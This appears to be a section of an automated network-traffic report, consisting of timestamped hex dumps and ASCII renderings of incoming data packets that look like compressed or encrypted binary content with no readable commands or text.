92 be 77 43 84 42 02 a5 43 89 4c 32 01 22 41 80 5f 9f b3 d5 4d 9c 9d b2 4d 47 ac 15 f6 1e 60 3f 78 0e 63 9c Data Ascii: ]9rI2H:X^+glc(&5i,9Y<`%:NH!<f+n<0A"3Gd>,^%sY1yb$$@"m K~Dyb\[wC2T]oM.(v?dwCBCL2"A_MMG`?xc
2023-11-18 09:02:40 UTC	4595	IN	Data Raw: 9a 8f 42 ee 09 6b 75 2d f9 10 8a e6 f3 ea ab 41 d1 03 24 84 9f ac 15 49 08 86 6c 15 7d 4c 20 5b 25 3d de cf d5 57 83 ca 33 7f 41 42 88 85 86 43 2d 6e d8 82 11 40 f1 22 be 6f ad c7 12 ca b8 a1 6b f1 c3 50 2f 37 f8 5d fb 3b 0f a5 d1 8f 53 dc 35 0d 08 c5 5a 21 c7 44 7b 30 c7 c4 8b b5 26 52 28 9a 23 be 84 0d ee 55 7c 49 7b 31 5e f2 0b f7 d0 78 49 7b c1 67 f8 77 9e 39 f9 0c 5e 9c eb aa 95 c6 4b da 8b c0 13 de 1f af 02 4f 4e d1 fb 9c 3f b8 07 89 0e a7 e8 a9 1d fa 07 5f 82 1b c0 68 d6 32 ce 60 34 f3 04 9b 7f d2 f1 bb 04 2a cd 1b c0 0d dc a3 11 dc 70 8a 88 2f c9 cf 41 a8 f4 f0 41 b5 6a 70 3e a8 46 8f 31 af cb ee 8a 1e 20 3a f0 af 6d 24 3a 9c e2 ac c5 a5 43 71 8f 75 f5 d5 a0 68 8e 30 12 d5 4a 61 24 3e 18 60 9a 90 86 ca 43 75 80 1b 78 e3 74 82 1b 3c 0b 65 5f b7 41 Data Ascii: Bku-A$Il}L [%=W3ABC-n@"okP/7];S5Z!D{0&R(#U\|I{1^xI{gw9^KON?_h2`4*p/AAjp>F1 :m$:Cquh0Ja$>`Cuxt<e_A
2023-11-18 09:02:40 UTC	4611	IN	Data Raw: 75 a5 cc 37 79 19 e6 f9 ea 8f c2 48 a0 d2 7c 83 97 f1 23 3d 36 79 19 a7 08 5e c6 af 7c 90 ed 47 2f 96 0d 2c 06 ef 8f 4d 2c 86 af 9b f8 69 cf c4 4d 2c 86 a7 95 7e de fa 2e d9 c4 62 9c a2 c7 2a d4 5f 11 8b e1 43 83 97 96 af 0c 15 e6 e3 f3 69 3d 16 28 cb 0d 88 4e c8 e6 03 75 e7 86 60 59 fc fa 92 9a b9 e1 a9 95 81 90 94 96 0d ee 3c d1 5a 5c 1f 14 cd 81 ac f8 9b 1b 88 ac f0 11 e0 7b 35 f3 c9 ae cc c0 1a 89 3c 25 50 34 b7 22 e3 41 dd 34 47 48 41 9e 12 a8 34 bf 3e ad 2b 03 95 e6 d7 55 4b af 86 4a 73 cc 67 ca e3 62 8e 89 79 f0 76 7d 0e 42 d1 03 49 1b 3c bb e2 40 7a 7c 5f a5 5a 85 a2 07 c8 14 f2 20 99 e2 14 01 a0 c8 87 8c ab 6c 57 e3 02 80 22 6f 35 a8 34 bf 3f ad 63 02 95 e6 37 00 14 19 5a 07 95 e6 37 00 14 ac d5 4d 00 c5 29 02 40 41 8f 9b 00 8a 53 1c 95 6a 15 8a Data Ascii: u7yH\|#=6y^\|G/,M,iM,~.b*_Ci=(Nu`Y<Z\{5<%P4"A4GHA4>+UKJsgbyv}BI<@z\|_Z lW"o54?c7Z7M)@ASj
2023-11-18 09:02:40 UTC	4627	IN	Data Raw: 81 22 57 ad ae b4 cf 81 82 a3 41 5b 44 af 6a 34 97 fa 59 bc 14 c5 fb 00 91 7c 58 3a 84 70 c1 11 c9 e7 15 3b 08 44 72 44 72 b0 76 9b 22 39 7a b3 cb c6 01 22 39 02 36 58 f2 a6 80 0d 1c d5 57 40 2c 8e ea 93 1c 91 1c 2a a0 22 39 7a 87 4c 09 bf 47 7f b8 bb d4 3b 22 39 7e 8b 14 5d 91 1c fd 15 37 fd 4b 0f b8 ed d4 5f 45 52 96 9c 8a a4 fe 13 fa 25 e2 e8 34 b0 7a 87 7e 09 2b b1 0f 1a 58 67 06 2e e9 74 02 22 87 49 3f 31 10 39 20 3a c2 ba ea 9b 56 d1 79 a9 5b 45 b1 a0 07 0a 8e 51 ae 1d 2c d7 be 60 db 1d 29 3a 12 28 c8 07 44 47 f8 a1 46 a3 55 d4 07 44 47 58 f2 d1 69 15 9d 9e 29 dd a8 40 24 f7 8d e7 24 9f b4 8a ce ea ba 65 54 18 10 c9 4d 97 89 05 22 f9 be 6c 1c a0 20 9f 8f ae 06 0b 14 e4 d3 a3 26 38 73 3a 62 13 9d b5 e7 b4 0d 14 e4 d3 57 ee 5c 85 03 05 f9 f4 6a 54 95 Data Ascii: "WA[Dj4Y\|X:p;DrDrv"9z"96XW@,*"9zLG;"9~]7K_ER%4z~+Xg.t"I?19 :Vy[EQ,`):(DGFUDGXi)@$$eTM"l &8s:bW\jT
2023-11-18 09:02:40 UTC	4659	IN	Data Raw: f2 17 5a 64 5d 8a 5a 64 f3 25 a3 a1 45 40 20 92 63 6a 29 0e 4d 2d fb 0b 91 32 9f c7 4b 91 f2 29 ae a7 36 aa 80 58 2b a8 97 79 af 5e aa 97 dd 83 e3 8a 8d 72 c4 be db 42 bd 9c b5 6a 54 2f 9f a2 5d da 0c a0 24 6f 97 7a 39 50 92 b7 76 ad d0 03 91 bc 5f 9f 51 5d 46 65 a7 38 ae d8 28 20 92 cf f2 42 0a 44 f2 55 5e 48 81 48 0e 59 73 ee d7 02 25 79 47 5e 7d de 92 ce bc fa d6 6f a3 b2 40 3a a3 1c 62 03 25 47 7f ae ef 2b a0 c5 03 4d a9 57 03 65 3b ba 55 8e c3 40 3c e3 d2 54 07 22 47 a4 e8 cf 5b 22 07 33 2f 5e d1 86 5d 0e 66 e6 c9 11 64 7b 1c 88 1c 08 7c e7 40 d6 15 f8 de 3b e4 d9 df 79 29 ca b3 4f 11 f2 ec bf fe fa 12 e2 19 57 ee fe 40 e4 58 d7 8c a5 cb c1 cc 85 64 43 79 97 02 65 3b 06 e2 db f9 04 87 e2 db 3d a6 6b d4 c8 30 28 e8 3e 45 bb e4 2a 40 49 3e de 72 88 0d Data Ascii: Zd]Zd%E@ cj)M-2K)6X+y^rBjT/]$oz9Pv_Q]Fe8( BDU^HHYs%yG^}o@:b%G+MWe;U@<T"G["3/^]fd{\|@;y)OW@XdCye;=k0(>E*@I>r
2023-11-18 09:02:40 UTC	4691	IN	Data Raw: 42 b1 5d 61 e7 9c bc 14 49 21 36 95 48 52 88 ab 30 8e 5d 54 54 dd 49 52 48 1f d8 19 44 97 9a 24 85 dc 22 48 21 6c 89 93 a4 10 0b 02 49 b6 a1 ab 30 6e 1b 14 e4 fb 98 f2 01 0c d0 fc d5 07 a7 c2 48 06 60 f7 5c c1 82 a2 71 00 41 f8 01 98 04 82 dc 22 80 20 b2 41 20 c8 2d 5a 46 3f e7 83 50 61 dc c1 a3 7c 88 02 8f de a2 c5 ba aa 9f 2f 92 42 b0 c7 58 ae 1b 80 ef 15 c6 c1 24 d6 b7 7d 11 08 72 8b bd 2c 54 41 d1 f8 28 f3 0f 28 1a 07 10 84 4d 74 91 fb 71 8b 85 fb e1 8a 36 4e 09 f9 1f 82 82 de a1 3d a6 fa ac ae a0 a0 56 2c a9 6f 50 61 7c 3b c5 23 fa f9 26 c5 e3 16 41 f1 e0 27 63 93 e2 d1 c7 ae 41 21 50 b4 81 10 0f be a8 ad 10 8f 01 20 99 9a 0f 80 64 71 60 15 7f 3b 14 8d ef c4 24 42 b1 c1 01 b8 c4 70 7c a8 30 0e 50 91 6a 75 88 f7 b0 49 8d 4d 4c d8 44 0f f1 1e 96 8b 55 Data Ascii: B]aI!6HR0]TTIRHD$"H!lI0nH`\qA" A -ZF?Pa\|/BX$}r,TA((Mtq6N=V,oPa\|;#&A'cA!P dq`;$Bp\|0PjuIMLDU
2023-11-18 09:02:40 UTC	4707	IN	Data Raw: 6d f8 3f 7e ee dc 41 d1 c6 7c 44 e0 37 34 2b da 00 c6 e7 1b 2f 10 e3 e3 07 f8 5d ff d5 a0 d2 c6 bc 68 3d a1 d2 c6 04 ad 27 d7 38 ae d8 76 27 68 3d df 98 83 b4 1e 4f ae 5a 54 43 f1 56 e3 5a 0f 42 65 cd 27 30 3e 7c 24 f3 d5 07 72 fa 67 4a c3 d2 24 c6 c7 d0 6f aa 9f cf a9 3e 38 3d c4 4d ef 63 12 e3 e3 a3 98 2f 14 ff 3b df f9 24 c6 c7 07 b4 57 67 ea 85 4a e3 0b 18 1f 16 77 11 e3 73 92 c0 f8 70 14 5d 4d 9f bb 05 8c 0f bf 1f 8b 18 9f 93 04 c6 87 8f 7d 11 e3 73 92 ef f5 c3 0d 8a c6 ad 8e 7d 0c 45 e3 80 f2 70 90 59 84 f2 9c 24 a0 3c 71 0a 5f 28 1a df 85 ff 0f 95 c6 37 a0 3c fc 4c 6c 42 79 4e f2 b9 56 77 50 69 7c 03 ca c3 56 b2 09 e5 39 49 40 79 f8 3e 36 a1 3c 27 89 fd 12 36 ea ad fd 92 11 68 e5 5f 78 41 fb 25 00 be d7 e8 b3 e5 f5 72 92 56 db 9f 50 2c 95 b3 62 b8 Data Ascii: m?~A\|D74+/]h='8v'h=OZTCVZBe'0>\|$rgJ$o>8=Mc/;$WgJwsp]M}s}EpY$<q_(7<LlByNVwPi\|V9I@y>6<'6h_xA%rVP,b
2023-11-18 09:02:40 UTC	4723	IN	Data Raw: af a2 71 1c 52 c7 5f f0 e1 21 75 9e 9c b9 8b 0c 15 b5 7a 3f c9 cb 80 8a b6 eb a1 87 f9 b2 84 8a 4b bd 6f 99 47 41 45 ad de 56 be 38 50 2f 33 12 36 7b 15 4b f4 b2 6c 08 45 1b bd 6c 93 bb 62 bb 7a c1 bf ca 12 9c 92 b5 0b 76 8f 11 40 13 d8 fd 24 47 ba 1b 5f 45 e3 20 66 a9 04 89 59 27 b9 32 74 01 4a 8f 64 a5 f3 f0 55 34 8e a0 3f d9 60 d0 9f 27 ed 23 d7 21 28 1a f7 20 23 b5 92 97 60 ac f3 1f 56 71 64 5c ab 38 27 99 4c 8e ab f8 ac ea 2a 8e 7f 82 d9 a8 5f ac e2 7c d7 a5 38 83 6c 0d 8c 2d b6 dd 46 c6 96 35 47 d2 e7 0d 0a 50 ef c9 3c 24 e2 aa 97 19 5b 0c ba ab a2 56 0d 54 2e b6 ab 46 2a d7 49 82 ca f5 8d 19 a4 72 9d 24 a8 5c df 58 2b 52 b9 00 56 ce bd 22 0c c2 59 5d 30 b6 fe 64 09 32 b6 4e d2 dd 05 f8 e5 84 a2 71 2c bd e8 06 b5 f4 d2 2e 6e 3e e6 06 4d b8 79 4f 16 Data Ascii: qR_!uz?KoGAEV8P/36{KlElbzv@$G_E fY'2tJdU4?`'#!( #`Vqd\8'L_\|8l-F5GP<$[VT.FIr$\X+RV"Y]0d2Nq,.n>MyO
2023-11-18 09:02:40 UTC	4739	IN	Data Raw: b1 a6 8f 68 8f 91 8c 85 f3 1b 27 dc b0 01 e2 4d 5e a7 01 d0 50 c6 bc 36 cb f1 91 f2 53 0e 51 b2 4b d8 64 51 46 2c 4f 77 c9 28 3a 3f de e4 dc e5 2a 21 75 a9 1c 06 65 9e 6a 65 d8 32 01 65 db e7 20 94 6d fd 14 78 8a fc 53 5d ea 52 19 e0 29 d2 40 8d 47 ea 52 dc c7 e4 9d 40 24 19 87 dd 98 0b 67 d8 00 f1 26 7b ea 1f 40 fa a9 b8 1b 5c 25 74 f1 2a 03 cc 46 1a f3 b1 a4 60 c5 9e 7d 2d 83 b1 a5 60 95 09 66 23 84 0f 11 51 c6 ac 9f 6b 68 27 a3 e8 90 7c f4 c2 11 91 7e 0a 94 47 da 96 66 93 4a 06 c3 c4 d6 8d 0c 86 09 d6 6a 82 f2 48 6b 70 3e d2 a3 5e 25 a8 5c eb 63 0e e9 51 ef 11 53 44 03 47 a4 5a 25 e5 11 91 84 af 7e 1d 2c d3 d6 8f 37 39 56 ae 8f b9 7c 40 ae 4f bd 56 d4 fa 48 c1 2a 87 dd 58 9d 28 76 e3 48 26 e5 11 11 85 2f 50 1e 69 32 ac 2e 3d ea 3d c5 42 8f f2 4f 3d d2 Data Ascii: h'M^P6SQKdQF,Ow(:?!ueje2e mxS]R)@GR@$g&{@\%tF`}-`f#Qkh'\|~GfJjHkp>^%\cQSDGZ%~,79V\|@OVH*X(vH&/Pi2.==BO=
2023-11-18 09:02:40 UTC	4771	IN	Data Raw: 58 8c 86 0b f0 af 49 91 62 d4 5c 30 2b f7 80 d0 70 55 fb 51 1e a0 46 dd 05 57 e5 c2 36 da 55 80 b8 9a 5e f4 8d 2c fc d8 cb 5a dd a8 a5 00 ca 1a fe 1f 42 11 ae f0 9b 5f ff dc 0a 45 06 bf 47 71 f8 7b 80 e4 20 72 d8 85 5a aa e2 2b 19 f7 41 84 54 79 69 79 bd 5e 0a c7 5e 3d bf 1c 2c 10 f7 f7 5e 09 16 8d 24 63 3f e9 20 f9 fb 1f 5b 21 73 30 f7 aa 02 c7 09 59 f8 3d 45 f6 e4 4a 31 da 5d 30 2b 4c 89 91 86 04 61 e4 a3 f8 35 b2 f0 79 56 1a 1c 23 0b 9f 63 ac 2f c8 c4 59 12 ce e7 28 47 75 bc 14 34 c2 05 6f 3c e4 49 35 69 a4 56 e1 f4 10 3d b5 51 73 01 d4 14 8a cb 69 a4 56 1d 07 55 ac 7f 7e 6c 85 86 0b 96 a7 9e 91 39 1a 54 45 99 25 40 fe 1e 47 5b 8f 2f 46 ae aa 31 38 5d 71 38 38 dd 85 7b 13 4e fa e9 60 b7 bf 1a c8 59 1a 16 23 71 9c 2f 3a b8 fc f1 b1 15 92 0c aa 32 ec 90 Data Ascii: XIb\0+pUQFW6U^,ZB_EGq{ rZ+ATyiy^^=,^$c? [!s0Y=EJ1]0+La5yV#c/Y(Gu4o<I5iV=QsiVU~l9TE%@G[/F18]q88{N`Y#q/:2
2023-11-18 09:02:40 UTC	4787	IN	Data Raw: 90 1e d7 27 1d 4c a8 f0 b8 7c ff 73 4a 62 eb cf e9 93 6a b3 62 a6 85 93 be eb 2b 09 ee fa 56 14 ed d7 ac 8c 15 9a 6c a1 96 1e 1f 94 6a e9 3d 64 0b 62 03 ca eb 78 fe c1 63 69 85 73 44 89 d1 8e af 81 72 ba 2b ca 62 f0 f5 59 2c 8b e1 64 3b b1 04 4a 1d db 6d c5 fc d0 07 ca a1 7a af 14 a0 54 de 7b a5 00 51 c2 9a e5 ee 41 7a 4b f6 aa e6 b9 40 54 1e f6 2b fe cf b7 ec 57 2b aa 95 d7 50 5b 8f 16 2d 51 7e c9 77 57 2d 51 9c ac 34 73 a0 94 38 ef aa 29 0b 44 46 eb e1 06 b4 c9 68 db 8f a5 ee 2a 0f 79 f5 95 fa 5c 5a 90 cf d5 76 19 81 06 19 6d 7f e5 88 9f a2 13 fb 76 7e 20 0f 73 33 9c 6c 36 e4 40 1c aa 6f e8 97 fa b1 38 e9 1b fa f4 8c 2e f5 63 b1 6d 2d d3 1b 68 24 a3 1b 6b 1c 6d 4a 8c aa 65 01 44 09 4f 91 ce 08 3a 47 dc 21 6f eb db a8 40 17 19 be b6 e7 de 27 d0 4e 86 b5 Data Ascii: 'L\|sJbjb+Vlj=dbxcisDr+bY,d;JmzT{QAzK@T+W+P[-Q~wW-Q4s8)DFh*y\Zvmv~ s3l6@o8.cm-h$kmJeDO:G!o@'N
2023-11-18 09:02:40 UTC	4803	IN	Data Raw: 20 15 0a 7b a5 54 28 cd 0e 61 73 12 1d f5 60 20 25 f1 0f 1f 21 e8 98 ed 64 ba 15 47 f1 0f ce d7 76 d5 92 78 19 77 77 3f 87 a5 88 a3 a3 f8 3f 26 ce 2c 63 41 9e 3a b3 6c 73 3e 2a c4 1d 28 9a 3a 76 bd c4 a7 c4 51 23 23 a3 01 81 36 19 19 0d 08 c4 a6 b2 1e 7d 20 4a f8 9e 93 e3 50 9d 9f 4b ae 3c a1 07 8a 49 3c 7e 13 87 43 27 20 34 65 a6 72 ce ae a3 1e 0c 3f cb c0 71 02 90 18 47 75 4c da 52 78 b6 91 43 29 a2 81 5a 30 3c d8 3a 06 b8 14 6c dd 16 62 aa a5 43 bb d4 55 cb f9 18 e2 42 b6 5c 3d 47 be 9a b6 4b 6b 9c 32 57 8e 62 80 d3 cd c1 b0 90 1d 45 af e6 54 e5 de 40 94 b0 7f 3d 25 a6 a6 c4 5d 52 8a 04 b7 32 cb 9d 3f f8 35 70 14 3a 50 c7 84 4d a9 8e c9 25 dd ea fb 85 0c 59 7d eb d8 19 8d 24 cc 81 ee 4b 86 1d 85 c5 1e c7 51 4c a2 1f fc a4 04 1d fe 9a 45 73 a6 45 e6 08 Data Ascii: {T(as` %!dGvxww??&,cA:ls>*(:vQ##6} JPK<I<~C' 4er?qGuLRxC)Z0<:lbCUB\=GKk2WbET@=%]R2?5p:PM%Y}$KQLEsE
2023-11-18 09:02:40 UTC	4819	IN	Data Raw: eb 23 c4 1a f0 36 fc 62 53 5d b3 e8 49 ca 2c 1d 43 53 df c9 bd cc d1 ce dc cb 2e c2 45 90 4b 6a 0f 17 41 17 fd a6 32 9b 0a 4f 40 bf 73 76 db 82 9a 1a e1 09 e8 62 53 b6 82 40 a1 63 f8 35 80 74 38 0a 1d 03 8c 40 7c 57 a3 6b 66 18 6e f3 d6 6b 1f 83 7b 9f f7 35 df 79 50 74 c4 df 79 a4 5f 5f 20 2a 87 41 88 ef 6a 2c fd ce 63 eb 2e 35 10 7b 05 63 0d a8 b4 02 45 af e6 d5 48 3a 12 28 7a 75 52 2c b3 bb 4c b1 0c d1 b7 ce 7f a9 80 5b e7 db 93 2a e7 dc ce 14 cb 2e fa 71 fb 64 90 0c b4 59 30 48 79 14 88 3a fc 34 aa e1 33 1f 6d d5 e6 90 d7 4b 20 ea 48 ee 9d 40 d4 e1 e7 8c 7c 8e a9 6d d4 9c 4a 13 15 88 af 64 f5 56 9e 7c 75 8e f6 09 bf 3e d5 58 da 5f cd dd cb 6f 30 c3 af 0f a2 0d 99 90 6e 26 97 76 11 5e 7a 5c 9d a7 69 b7 74 72 48 7f a7 0e 19 84 ee 93 43 9a 93 fe 92 dd e7 Data Ascii: #6bS]I,CS.EKjA2O@svbS@c5t8@\|Wkfnk{5yPty__ Aj,c.5{cEH:(zuR,L[.qdY0Hy:43mK H@\|mJdV\|u>X_o0n&v^z\itrHC
2023-11-18 09:02:40 UTC	4851	IN	Data Raw: 9c f1 5b e8 e8 f4 03 b8 e2 88 80 55 a0 49 1d 33 92 4b 3b a2 8e 94 c8 c8 d1 eb a0 73 7f 52 b9 b8 3f af 58 82 37 ca d1 ab 2a 73 7f 3a 62 55 fd a4 79 25 8a 4f f3 61 b7 f3 92 1f de 8b 23 8a cf 2b e2 72 92 bf f9 e0 e5 e4 15 77 50 24 38 7a 3a 66 4a 3f 06 c4 9f 76 e2 ce 8b ca 27 ef bc ae 98 2e aa 1c b1 2a dc fc a8 04 6f 7e ae 88 eb 1a 2a 17 d1 e5 30 df cd 19 d3 67 2e 7d 26 9c 9d 92 bf 87 d8 29 c7 cb fc 2e e5 bc ff 18 2f 5d 3b 75 28 5d fb 78 e9 da fd da 69 44 ba f6 c1 74 ed 7f 7e 09 75 3e 40 ba f6 6f 3e 68 9c 0c 9e 63 fd 77 ea e0 85 c2 15 71 0b c0 7e 2c de 02 5c 31 1d 79 03 71 32 2c 9c 53 73 fa 2c 9e 53 8f 97 31 5d 55 2d cd 44 cb 78 1e 43 a2 fc e7 e3 65 33 57 cf 79 86 6c 89 fa 86 38 b6 1c bd 21 f1 84 e2 fc 08 2b a1 f8 15 7b 9e 89 bb 6b 26 ee 11 d9 a0 1c b1 04 ce Data Ascii: [UI3K;sR?X7s:bUy%Oa#+rwP$8z:fJ?v'.o~*0g.}&)./];u(]xiDt~u>@o>hcwq~,\1yq2,Ss,S1]U-DxCe3Wyl8!+{k&
2023-11-18 09:02:40 UTC	4867	IN	Data Raw: 7b 39 89 6d 73 d3 37 7f dc a3 87 5f f3 c7 e5 c8 9b c5 40 d5 5c b5 cd d3 c0 72 59 cf 5c 25 2d 2c 39 40 2a fb 69 a0 a8 d1 df 25 a5 25 a0 e8 55 b7 d7 65 8a 83 40 ac 81 db 04 79 74 dd 26 1e 72 d5 dc e1 7a a8 9d 40 2a ce 44 a0 18 60 cf 04 59 8e 42 fc b0 57 9b eb e7 ec ba 66 3c d7 eb d6 72 e4 7d f2 69 f2 b9 56 28 19 7e 20 67 6e 6b 84 06 02 9e 7a 24 26 71 ec cc 6c 1d 68 46 41 66 b6 0e 54 59 20 c7 db 40 3d 0a 36 dc 68 ff 8e 82 7d c4 1c 39 46 54 e3 f0 21 fe 21 7b 3b c9 3c 72 8c 80 9c 29 3a 03 45 af 4e df 45 23 07 62 81 e7 90 fe 78 09 6d 16 20 ac d2 5f 2c a0 70 37 4e 9a e3 07 aa 2c 50 34 92 40 d1 5d cf c4 1f 8b 7a 1c dd 52 87 27 dc 57 8d c5 23 15 01 4f 0e 45 1c 04 3c 21 f3 2d b7 9b 40 64 8e 7b ad 78 e8 5e 6b 7e 13 f9 1c 0d e4 cc 9f 2f d9 bb 1e 9d 80 76 14 94 eb e4 Data Ascii: {9ms7_@\rY\%-,9@i%%Ue@yt&rz@D`YBWf<r}iV(~ gnkz$&qlhFAfTY @=6h}9FT!!{;<r):ENE#bxm _,p7N,P4@]zR'W#OE<!-@d{x^k~/v
2023-11-18 09:02:40 UTC	4883	IN	Data Raw: 92 9a 58 3c d5 5d 1c 10 26 ae 3c 02 74 31 92 0e 38 91 e5 9b 80 13 f9 13 05 f6 7c 38 4b 86 08 3b 2d 10 cc 16 80 f8 40 0e 51 24 20 d8 2c 3f 45 43 14 09 08 1d d3 9d 6a a0 97 3a 40 d8 29 e5 24 ec 1c a3 12 76 3a da 2c b0 63 46 d8 fa 86 08 3b 2d 42 ec d1 0d 05 43 af c6 01 47 95 94 cb 51 35 3e 85 61 dc 11 95 af 23 ca 0a 47 54 5e b8 3f 81 e2 ad 1d 2f 6c 00 7c 56 af 6c 00 ee 6a 90 f2 97 c1 f5 03 49 79 b3 46 63 b8 31 8c 11 39 13 81 5e 16 ec 9e 8f a4 e9 04 79 b7 86 af 42 cc 1d 75 16 94 c5 12 28 46 de 7b 12 4a 01 f1 ff e8 38 b1 50 79 d7 89 c5 c8 7e 14 5b eb 28 7a 85 50 eb 6c 8a b1 9c 36 c7 8a 7b 19 28 6a 0c f7 15 c5 38 86 7c 45 e6 4b 53 aa 68 a4 32 e6 3f 38 e0 cd a0 8e 21 6f c6 18 e0 42 52 0d 72 21 99 58 bc 19 40 54 5e f2 79 01 71 e4 63 b5 da 2b f9 26 ae b2 a4 1d 73 Data Ascii: X<]&<t18\|8K;-@Q$ ,?ECj:@)$v:,cF;-BCGQ5>a#GT^?/l\|VljIyFc19^yBu(F{J8Py~[(zPl6{(j8\|EKSh2?8!oBRr!X@T^yqc+&s
2023-11-18 09:02:40 UTC	4899	IN	Data Raw: e7 01 b2 0a 1f c8 e7 d9 ba cb aa d3 20 c3 72 a7 17 15 48 3a fa be 32 dc dd 2b c3 1d f1 7c d5 14 33 47 82 74 71 69 a0 ae 4f f4 46 dd 3e 0f 70 4c cd 8f 7b ee 8b cc 3d bd c8 dc 61 8e 2a 09 ba dc 04 b9 7a db 24 18 83 15 5e d2 c7 b6 b9 03 12 a3 5d b5 c5 01 ea 62 d8 9c 40 74 89 31 fa d6 54 d3 76 f0 49 67 3c 37 d5 0f 2b 87 33 9e 25 ba e7 79 8b 14 b1 25 31 0e 2d 7d 6d d8 ce 40 a4 a6 e0 a5 87 7d 3b 91 9b 9a b5 93 09 a4 19 d5 90 cf f2 bb 18 cc 67 09 32 16 99 af d2 31 bd c8 84 8b 1f 2f 91 88 a4 7c 9d f5 1f 0c a4 55 b4 c1 a7 e8 b7 5f 1f 23 e9 80 4f 91 56 6a b9 08 82 74 9c 57 8f b2 6b a7 be 92 e7 e8 b5 2f 01 62 53 0f 2a e4 e9 59 3d a7 b6 9c cf 73 db 32 41 a4 a6 90 16 c3 4d 35 6d ee 9e a7 d9 00 41 c4 5e a1 18 b6 bb fb b0 de dd 4b f6 3b 8c 80 ff f9 f7 63 c4 5e 8d 2a a3 Data Ascii: rH:2+\|3GtqiOF>pL{=az$^]b@t1TvIg<7+3%y%1-}m@};g21/\|U_#OVjtWk/bSY=s2AM5mA^K;c^*
2023-11-18 09:02:40 UTC	4906	IN	Data Raw: 4e 3d b5 91 c8 dd ff 85 05 3c c9 1c 32 c3 a7 39 8a e6 f6 4b 81 ed a8 b0 a0 c9 7b d9 11 65 64 2e d3 40 6c 2e 34 a9 12 4e 4d aa 91 63 e5 6f d0 69 dd 66 e4 6e b9 58 76 fa 34 1c b2 cf 6b 10 15 69 ca c8 3d ae 56 d1 75 e1 90 99 b7 2f 90 0a 66 cf b9 db 69 0f 57 cd 1f fb fa 0d 3a 7d 1a ce 12 71 a9 71 1d 2d 16 a4 65 bf a3 c6 82 34 88 75 c4 aa 4a de 9d 1d 15 16 5c 1b e4 c3 3c 58 20 d3 b2 df 11 65 5c f6 70 40 9c 0c 48 fc ca 4d 18 88 1c ed ba 41 3e cc 9c 05 32 c3 a7 39 62 ab ae b8 ce 6e 64 41 19 d0 3a 4b c6 d2 d2 37 56 b9 7b 4e ad b3 3d c3 66 28 78 47 2c 80 07 68 7c 0f a0 c2 02 fb 9d e3 c8 09 b4 a2 e0 b2 fd a8 ca 02 0e 32 d5 86 b8 6b 47 ab 9a bb 35 4b 38 dd 9a eb 9d 05 3c 90 0a d2 f6 c3 51 08 6f 35 a3 a4 19 e2 d1 b9 dd fe ce 8e 06 0b 32 f2 b0 23 56 05 15 92 aa a2 0a Data Ascii: N=<29K{ed.@l.4NMcoifnXv4ki=Vu/fiW:}qq-e4uJ\<X e\p@HMA>29bndA:K7V{N=f(xG,h\|2kG5K8<Qo52#V
2023-11-18 09:02:40 UTC	4938	IN	Data Raw: 32 12 07 dc 49 a8 db 3f 74 27 01 71 c8 42 9a 48 45 e1 18 5e 39 e6 74 51 a5 79 06 a4 c1 f0 81 13 4a ae 38 40 ac 6e 6b 0e 15 4d 44 8e fe 39 96 22 a0 a6 04 38 23 f8 fe 32 72 8e cb 7b ea 44 ac 55 6f a5 59 93 68 2a c1 21 9c 88 54 14 cc 3c d4 89 5d 66 1e 8f 88 e3 eb 97 bf 5f 42 6a e0 f3 e7 f7 a3 ba 7d 6a 50 77 9c 6b bf b2 af ba ce b5 21 c6 4d 91 fe 8f 40 aa 15 0e bc 6e 87 0e bc 21 4e eb dc 01 69 24 76 38 8e 53 ef f6 a9 e5 ee 11 6f 2b 73 27 12 39 ce ce ea f6 ae b3 73 88 b1 78 fd 50 51 f7 ed de 5d 8e b4 91 48 93 4c 87 b7 b7 54 2a 4c 44 f2 51 5e fe 89 92 bc 7d a0 3b c8 c9 32 10 db f1 88 f5 26 9c a8 31 a1 db da 89 48 45 0d 3b 2a 23 9a 4a b0 7f 51 22 15 05 a5 c2 ca a1 e5 ae 65 b8 44 f6 55 53 b8 44 88 71 24 73 51 52 37 0e d1 8e 47 89 c4 71 ad 1a 57 76 e3 13 62 d8 54 Data Ascii: 2I?t'qBHE^9tQyJ8@nkMD9"8#2r{DUoYh!T<]f_Bj}jPwk!M@n!Ni$v8So+s'9sxPQ]HLTLDQ^};2&1HE;*#JQ"eDUSDq$sQR7GqWvbT
2023-11-18 09:02:40 UTC	4954	IN	Data Raw: 25 6b 38 48 28 fb cd 21 a3 f7 bc a2 b0 ad 66 ee c2 b6 20 cb b6 1d 48 c2 11 80 aa 5b 1f 91 84 c3 71 c9 cf 0a bb ab 84 d3 b6 fd 4b be 1f 43 b6 6d 90 50 27 f8 91 c8 b6 fd 92 b4 6d 6b 43 1e b2 6d 83 5c 9f fa 69 81 24 1c 8e 00 35 0f 05 1c 81 5c f5 69 49 24 e1 b0 fd fa e5 1c b2 6d 83 84 3a 21 75 19 44 29 7c c2 78 67 19 53 b6 6d 90 95 df 27 d0 ad 86 e5 2c 82 44 5a 70 54 09 59 f8 94 6d 1b e4 6e 2b 91 17 c2 6c a0 6d db 32 64 db 06 49 db b6 64 c8 b6 fd 92 b4 6d 6b e6 53 b6 6d 90 bb 6d 64 53 26 ec 89 2d bb 6d 64 53 f1 51 13 39 c0 da d3 9d b7 4f 83 c9 f8 28 dd 96 a6 e2 a3 e6 85 83 b3 71 c8 b6 0d b2 3c e2 03 49 38 0d d2 f9 c5 42 a4 ae 68 90 76 57 32 48 4f 06 e4 b6 09 2a 1b 22 c8 32 48 07 52 57 bb 92 5c 04 92 70 da 9d ff a9 79 c8 ee 3c af 15 c5 73 53 c6 92 dd 19 e4 55 Data Ascii: %k8H(!f H[qKCmP'mkCm\i$5\iI$m:!uD)\|xgSm',DZpTYmn+lm2dIdmkSmmdS&-mdSQ9O(q<I8BhvW2HO*"2HRW\py<sSU
